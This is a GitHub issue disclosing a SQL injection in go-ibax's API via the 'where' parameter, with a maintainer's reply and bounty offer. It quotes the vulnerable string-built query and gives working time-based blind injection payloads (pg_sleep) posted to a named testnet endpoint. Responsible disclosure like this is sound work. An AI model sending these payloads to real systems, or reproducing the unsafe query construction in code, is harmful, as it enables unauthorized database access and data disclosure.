Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

SQL injection vulnerability via where parameter #2063

Open
4 tasks done
QSec-Team opened this issue Oct 24, 2022 · 1 comment
Open
4 tasks done

SQL injection vulnerability via where parameter #2063

QSec-Team opened this issue Oct 24, 2022 · 1 comment

Comments

@QSec-Team
Copy link

QSec-Team commented Oct 24, 2022
edited

Describe the bug

SQL Injection vulnerability in /packages/api/database.go of go-ibax via where parameter allows attacker to spoof identity, tamper with existing data, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.This issue affects versions starting from commits on Jul 18, 2020.

file:

go-ibax/packages/api/database.go

Line 189 in 6bac746

sqlQuest = fmt.Sprintf(`select * from "%s" where %s order by %s offset %d limit %d`, tableName, where, execOrder, (page-1)*limit, limit)

commits:
ac76098#diff-bcab25c94cb216acdcdc607a2071aa896f187754698d3d523050308e17f32aabR174

POC:
Request URL: https://testnet-hk1.ibax.network:5079/api/v2/open/rowsInfo
Request Method: POST
PostData: order=1&where=1=1%3b%3bselect+pg_sleep(10)%3b--&table_name=pg_user&limit=1&page=1

Reproduction

Request URL: https://testnet-hk1.ibax.network:5079/api/v2/open/rowsInfo
Request Method: POST
PostData:
order=1&where=1=1%3b%3bselect+pg_sleep(10)%3b--&table_name=pg_user&limit=1&page=1
image

as you can see, when I use pg_sleep, the request is delayed 10s.

PostData:
order=1&where=1=1%3b%3bselect+case+when((select+length(current_database()))=4)+then+pg_sleep(5)+else+pg_sleep(0)+end%3b--&table_name=pg_user&limit=1&page=1

image
as you can see, when I use pg_sleep to judge the length of current_database , it shows 4.

System Info

*

Logs

No response

Validations
scottafk pushed a commit that referenced this issue Dec 2, 2022
@group-monkey
remove unused code (#2074)
b0183d8 
Fixed #2060, #2061, #2062, #2063
@yolandadadada
Copy link
Member

Thank you for your interest in our project, the IBAX development community welcomes hardcore developers like you, which is quite exciting for the IBAX network that is working on development and has not really started rolling out yet.

Regarding the few bugs you mentioned, they lie in the interface services provided to the blockchain explorer for the IBAX testnet, which is an old version of the problem and is part of the deprecated useless code that no longer works in the current version. Of course, we will remove this useless code.

Anyway, thank you again for your dedication and help, please contact Yolanda(Telegram:@yolandadadada ) and the IBAX Foundation will reward you with 1000 IBXC (IBAX Native Coin). We hope that good developers like you will continue to follow us and maybe we can work together in the future.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@yolandadadada @QSec-Team